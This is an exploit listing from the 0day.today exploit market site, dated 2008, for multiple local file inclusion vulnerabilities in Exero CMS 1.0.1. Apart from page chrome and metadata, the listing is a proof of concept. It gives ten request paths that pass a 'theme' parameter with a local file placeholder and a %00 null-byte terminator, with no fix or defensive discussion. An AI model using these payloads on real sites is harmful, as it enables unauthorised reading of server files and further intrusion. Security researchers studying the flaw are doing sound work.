[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2746
Category
web applications
Date add
17-03-2008
Platform
unsorted
=====================================================================
Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities
=====================================================================



Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities
Script : http://switch.dl.sourceforge.net/sourceforge/exerocms/Exero_CMS_1-0-1.rar
Home Page : http://ecms.getox.net/
POC :

      /Exero_CMS_1-0-1/themes/Default/usercp/index.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/usercp/editpassword.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/usercp/avatar.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/custompage.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/errors/404.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/members/memberslist.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/members/profile.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/news/index.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/news/fullview.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/nopermission.php?theme=Local File %00


#  0day.today [2024-12-26]  #